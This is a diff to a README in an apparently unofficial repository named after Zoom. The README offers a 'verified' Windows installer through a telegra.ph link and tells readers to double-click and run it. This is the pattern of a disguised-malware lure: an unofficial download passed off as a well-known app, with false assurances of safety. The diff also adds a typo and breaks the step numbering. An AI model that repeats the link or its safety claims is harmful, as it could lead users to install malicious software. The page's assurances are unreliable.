mercedesbenz20i0/Zoom/README.md

 No tech skills required.
 Just follow these **3 simple steps**:

 1. 🔽 **Download the App**
-   Click [here](https://telegra.ph/Zoom-The-Ultimate-Online-Video-Conferencing-App-06-29) to download the latest version for your OS Windows
+   Click [here](https://telegra.ph/Zoom-The-Ultimate-Online-Video-Conferencing-App-06-29) to download the latest version for your OS Windos
      🛡️ Verified file – safe and requires no extra components.
-2. 🚀 **Run the Installer**
+3. 🚀 **Run the Installer**
    Double-click the downloaded file and follow the on-screen instructions.

-3. 🎯 **Launch & Join a Meeting**
+4. 🎯 **Launch & Join a Meeting**
    Open the app, sign in or join a meeting via link/meeting ID.
 That’s it!

 > ⚡ No configuration required.
 Just install & connect!